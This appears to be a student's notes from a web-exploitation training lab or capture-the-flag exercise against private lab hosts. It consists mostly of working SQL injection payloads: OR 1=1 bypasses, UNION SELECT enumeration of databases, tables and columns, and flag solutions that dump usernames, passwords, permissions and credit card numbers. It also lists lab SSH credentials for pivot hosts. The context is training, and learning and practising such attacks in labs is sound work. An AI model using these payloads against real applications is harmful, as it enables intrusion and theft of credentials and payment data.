///// DEMO SITES \\\\\

http://10.50.23.102/uniondemo.php?Selection=3&Submit=Submit
http://10.50.23.102/uniondemo.php?Selection=3 OR 1=1&Submit=Submit

http://10.50.23.102/uniondemo.php?Selection=3 UNION SELECT 1,2,3;
http://10.50.23.102/uniondemo.php?Selection=3 UNION SELECT name,pass,id from session.user;#
=====================================================================
#Identify Databases
'union select 3,table_schema,4 from information_schema.tables union select 5,6,'7

#Identify Tables on a specific database
'union select 3,table_name,4 from information_schema.tables where table_schema = '<database of interest>' union select 5,6,'7

#Identify Columns on a specific table
'union select 3,column_name,4 from information_schema.columns where table_name = '<table of interest>' union select 5,6,'7

#Dump infomation from columns of interest
'union select 3,concat(<columnname>, ":", <columnname>),4 from <tablename> union all select 5,6,'7

#Dump Database via URL
?category=1 UNION SELECT table_name,COLUMN_NAME,4 from information_schema.columns

========================================================================
//// SQL Flags \\\\
Scheme of Maneuver:
>internet_grey_host: 10.50.28.45	student		e9YErLDvFlUWxX0
->Pivot(Donovian_Webserver): 192.168.28.111:2222		comrade : StudentWebExploitPassword
-->T1(donovian-nla): 10.100.28.48:80

Flag 1: On the DNLA site identify the flag using the Categories page.
(in the url)
http://10.100.28.48/cases/productsCategory.php?category=1 or 1=1

Flag 2: How many tables are able to be identified through Injection?
(in the url)
http://10.100.28.48/cases/productsCategory.php?category=1 UNION SELECT 2,table_name,4 from information_schema.tables where table_schema = 'sqlinjection' union select 5,6,7

Flag 3: Provide the password for users with administrator access to the DNLA database.
(in the url)
http://10.100.28.48/cases/productsCategory.php?category=1 UNION SELECT 3,concat(username, ":", password, ":", permission),4 from members union all select 5,6,7

Flag 4: Utilizing the Search page on DNLA, identify the flag.
(in the search bar)
word' or 1='1

Flag 5: Identify the version of the database that Shenanigans is utilizing.
(in the url)
http://10.100.28.48/cases/productsCategory.php?category=1 union all select null, version(), null--

Flag 6: Utilizing the input field on DNLA budget page, find the flag associated with credit cards.
50) FROM categories UNION SELECT 1, 2, 3, creditcard_number FROM payments;# AND categories.id = category) AS maxamount FROM categories HAVING maxamount IS NOT NULL

Flag 7: Find the flag associated with id 1337.
(from the url)
?category=1 UNION SELECT mime,data,id from sqlinjection.share4

Flag 8:
(from the username field)
Hacker', 'pass', 'qwer@gmail.com', 1);#

==========================================================================================
////XXS Flags\\\

Pivot (Donovian_Webserver) 192.168.28.111 2222(SSH)		comrade :: StudentWebExploitPassword

T1 (Donovian_MI_websvr) 10.100.28.40 4444(SSH)






